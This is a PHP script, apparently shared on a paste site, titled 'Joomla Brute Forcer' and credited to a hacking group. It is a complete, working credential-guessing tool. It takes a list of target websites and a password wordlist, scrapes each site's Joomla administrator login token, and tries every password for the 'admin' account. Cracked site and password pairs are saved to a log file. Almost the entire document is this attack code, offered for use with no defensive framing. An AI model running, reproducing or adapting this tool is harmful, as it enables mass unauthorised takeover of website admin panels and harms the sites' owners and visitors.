Panel Brute Force Joomla

1. <?php
2. set_time_limit(0);
3. /*
4. * Joomla Brute Forcer
5. * Coded by miyachung
6. * miyachung@hotmail.com
7. * Janissaries.Org
8. * Special Thanks burtay
9. * Usage-> php Bruter.php SITELIST PASSWORDS
10. * Example-> php Bruter.php SITES.txt PASSWORDS.txt
11. */
12.  
13.  
14. class jom
15. {
16.  
17. public $sites;
18. public $wordlist;
19. private $user = "admin";
20. private $regex = "/([0-9a-f]{32})/si";
21. private $timeout = 7;
22. private $cookie_file = "cookie.jani";
23. private $log_file = "cracks.txt";
24.  
25. private function save_File($content)
26. {
27. $fp = fopen($this->log_file,'ab');
28. fwrite($fp,$content);
29. fclose($fp);
30. if($fp)
31. {
32. return true;
33. }
34. else
35. {
36. return false;
37. }
38. }
39. private function get_Hash($site)
40. {
41. $curl = curl_init();
42. curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
43. curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
44. curl_setopt($curl,CURLOPT_COOKIEJAR,$this->cookie_file);
45. curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout);
46. $play = curl_exec($curl);
47. curl_close($curl);
48. if(preg_match('#value="com_login"#si',$play))
49. {
50. preg_match($this->regex,$play,$hash);
51. return $hash[1];
52. }
53. else
54. {
55. echo "[-]Hash not found,passing site\n";
56. return false;
57. }
58. }
59. private function tryPassword($site,$password,$hash)
60. {
61. $curl = curl_init();
62. curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
63. curl_setopt($curl,CURLOPT_POST,TRUE);
64. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,TRUE);
65. curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
66. curl_setopt($curl,CURLOPT_COOKIEFILE,$this->cookie_file);
67. curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout);
68. curl_setopt($curl,CURLOPT_POSTFIELDS,"username=".$this->user."&passwd=".$password."&lang=&option=com_login&task=login&".$hash."=1");
69. $play = curl_exec($curl);
70. curl_close($curl);
71. return $play;
72. }
73. public function bruter()
74. {
75. $sites = explode("\n",file_get_contents($this->sites));
76.  
77. foreach($sites as $site)
78. {
79. if(!preg_match('#http#si',$site)) $site = "http://".$site;
80. $site = trim($site);
81. echo "\n[+]$site\n";
82. $hash = $this->get_Hash($site);
83. if(!$hash){continue;}
84. echo "[+]$hash\n";
85.  
86. $wordlist = explode("\n",file_get_contents($this->wordlist));
87. foreach($wordlist as $password)
88. {
89. $try = $this->tryPassword($site,trim($password),$hash);
90. if(preg_match("/com_config/si",$try))
91. {
92. echo "\n\t[*]Password cracked-> ".$password."\n";
93. echo "\t[*]Saved to the log file\n";
94. $this->save_File("$site|$password\r\n");
95. break;
96. }
97.  
98. }
99. }
100. }
101. }
102.  
103. if(!$argv[1] || !$argv[2])
104. {
105. echo "################################################\n";
106. echo "\t\tJoomla Brute Forcer\n";
107. echo "\t\tCoded By miyachung\n";
108. echo "\t\tJanissaries.Org\n";
109. echo "################################################\n";
110. echo "\n[-]Missing arguments\n";
111. exit;
112. }
113. elseif(!file_exists($argv[1]) OR !file_exists($argv[2]))
114. {
115. echo "################################################\n";
116. echo "\t\tJoomla Brute Forcer\n";
117. echo "\t\tCoded By miyachung\n";
118. echo "\t\tJanissaries.Org\n";
119. echo "################################################\n";
120. echo "\n[-]File not found\n";
121. exit;
122. }
123. else
124. {
125. echo "################################################\n";
126. echo "\t\tJoomla Brute Forcer\n";
127. echo "\t\tCoded By miyachung\n";
128. echo "\t\tJanissaries.Org\n";
129. echo "################################################\n";
130.  
131. $jom = new jom;
132. $jom->sites = $argv[1];
133. $jom->wordlist = $argv[2];
134. $jom->bruter();
135. }
136.  
137. ?>